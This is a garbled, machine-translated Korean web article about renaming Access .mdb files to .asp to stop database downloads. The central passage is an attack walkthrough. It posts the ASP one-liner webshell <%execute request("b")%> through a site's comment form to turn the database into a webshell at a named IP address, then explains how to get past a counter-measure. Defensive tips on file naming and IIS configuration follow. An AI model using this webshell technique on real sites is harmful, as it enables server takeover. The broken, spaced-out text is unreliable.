access mdb 를 asp 로 바 꾸 는 재난 mdb 다운로드 방지 방법
2879 단어 accessmdb 다운로드 방지
Microsoft VBScript '800a03f6'
'End'
/iisHelp/common/500-100.asp, 242
Microsoft JET Database Engine '80004005'
'D:\log_mdb\%29dlog_mdb%29.asp' 。 , 。
/test/conn.asp, 18
제출:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp 는 인터넷 급행열차 등 도구 로 데이터 베 이 스 를 직접 다운로드 할 수 있 습 니 다.우 리 는 홈 페이지 로 돌아 가'네티즌 평론'기능 을 제공 하 는 것 을 보 았 다.사용 자 를 등록 하고 댓 글 을 보 냅 니 다.<%execute request("b")%>이렇게 하면 asp 코드:<%execute request("b")%>를 데이터베이스 에 기록 합 니 다.그러면 데이터 베 이 스 는 바로 우리 의 웹 셸 입 니 다.제출:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp 는 어 지 러 운 코드 의 마지막 에 보 았 습 니 다
/iisHelp/common/500-100.asp, 242
Microsoft VBScript '800a000d'
: 'execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp, 1266
주의:우리 가 데이터베이스 에 코드 를 제출 할 때 코드 내용 이 너무 크 면 안 됩 니 다.그래서 우 리 는<%execute request("b")%>를 사용 합 니 다.3.다른 문제 와 사고 1.접 두 사 를 asp 로 바 꾸 었 고 데이터베이스 에<%='a'-1%>등 불법 asp 코드 를 추가 하여 다운로드 하 는 데이터 베 이 스 를 철저히 방지 합 니 다.불법 asp 코드 가 존재 하기 때문에 우리 의 webshell 코드 를 삽입 한 후에 실행 하면 앞의 불법 코드 의 오류 만 표시 하고 우리 셸 의 코드 를 실행 하지 않 습 니 다.비록 이렇게 하면 일정한 공격 을 방지 할 수 있 지만 일정한 위험 이 존재 합 니 다.우 리 는 잘못된 코드 전에 호 환 오류 코드 를 추가 하면 우리 가 삽입 한 웹 셸 코드 를 정확하게 표시 할 수 있 습 니 다.2.접 두 사 를 고치 지 않 은 mdb 파일 에 대해 서 는 배경 비밀 번 호 를 직접 다운로드 하여 배경 에 들 어 갈 수 있 습 니 다.데이터 베 이 스 를 이용 하여 예비 접 두 사 를 asp 로 바 꿀 수 있 습 니 다.mdb 다운로드 방지 방법 소결 1:iis 6 아래 확장자 가 정의 되 지 않 으 면 접근 할 때 파일 이 찾 지 못 한 404 오류 가 발생 합 니 다.따라서 데이터 베 이 스 를 절대 나타 나 지 않 는 파일 이름 으로 임의로 명명 하면 안전 한 효 과 를 얻 을 수 있다.예 를 들 어 xxxxx.xxxxxxxxxxxxxxxxxxxx 2 는 데이터 베 이 스 를 사이트 외부 에 두 면 절대 접근 할 수 없다.예 를 들 어 e:/web/는 웹 사이트 에서 데이터 베 이 스 를 e:/3 에 놓 습 니 다.4.mdb 를.asp 로 바 꾸 거나 winhex 로 열 면 176 이후 아주 긴 00 문자열 이 있 음 을 발견 할 수 있 습 니 다.예 를 들 어<%response.write('불법 접근')response.end()%>는 현재 데이터베이스 이름 에'\#'과 빈 칸 을 모두 풀 었 습 니 다.자신의 서버 라면 IIS 에 설정 합 니 다.빈 DLL 파일 을 새로 만 든 다음 IIS 에 맵 을 추가 합 니 다.방금 만 든 이 DLL 을 실행 할 수 있 습 니 다.확장 자 는 mdb 를 쓰 고 저장 한 후에 IIS 서 비 스 를 다시 시작 하면 됩 니 다.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
Access 손상된 mdb 파일 복구연결된 서버 "xxx"OLE DB 공급자 "Microsoft.ACE.OLEDB.12.0"데이터 원본 개체를 초기화할 수 없습니다. 링크 서버 "xxx"의 OLE DB 공급자 "Microsoft.ACE.OLEDB.12...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.